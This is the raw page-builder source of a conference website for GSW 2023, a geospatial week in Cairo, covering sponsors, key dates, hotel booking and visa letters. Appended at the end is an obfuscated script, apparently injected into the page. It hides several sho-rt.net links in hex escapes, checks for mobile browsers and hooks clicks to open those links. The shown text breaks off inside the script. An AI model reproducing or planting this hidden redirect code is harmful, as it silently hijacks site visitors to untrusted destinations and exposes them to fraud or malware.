target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#686868\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_row_inner][vc_column_inner][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Camera ready paper submission: July 15, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul style=\"text-align: center;\">\n<li style=\"text-align: left;\">\n<h5><strong>-Deadline for submission of travel grants                                           funded by </strong><strong style=\"text-align: center;\">The ISPRS Foundation is: June 16, 2023</strong></h5>\n</li>\n</ul>\n<h5 style=\"text-align: center;\"></h5>\n<ul>\n<li style=\"text-align: left;\">\n<h5><strong>-Early bird registration deadline: July 1, 2023</strong></h5>\n</li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" button_alignment=\"btn_center\" css=\".vc_custom_1686689514453{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 